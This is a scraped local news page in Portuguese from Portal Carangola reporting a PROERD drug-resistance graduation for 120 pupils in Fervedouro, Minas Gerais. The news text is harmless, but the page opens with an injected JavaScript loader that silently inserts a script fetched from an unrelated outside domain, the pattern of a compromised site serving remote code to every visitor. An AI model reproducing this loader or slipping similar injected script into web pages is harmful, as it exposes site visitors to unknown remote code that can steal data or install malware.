;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PROERD - Forma 120 alunos em Fervedouro. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

PROERD – Forma 120 alunos em Fervedouro.

No dia 20 de junho do corrente ano, 120 alunos do Quinto ano de escolaridade do Município de Fervedouro foram formados pelo Programa Educacional de Resistência às Drogas – PROERD. A formatura aconteceu na Quadra Poliesportiva Municipal e contou com a presença de várias autoridades Civis e Militares. Durante o evento, os alunos demonstraram empolgação e muita alegria por terem participado desse Programa, o qual visa conscientizar as crianças sobre o perigo que o uso de drogas representa para o ser humano. Participaram do Programa os alunos da Escola Municipal Ribeirão do Jorge, Escola Municipal de Fervedouro e Escola Estadual Joaquim Bartolomeu Pedrosa.
O Proerd é mais uma ação que auxilia os pais a protegerem seus filhos contra as drogas, através de informações corretas e atualizadas para que as crianças, ao longo da vida, possam tomar suas próprias decisões de forma consciente e saudável.

IMG_20160620_194416764

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.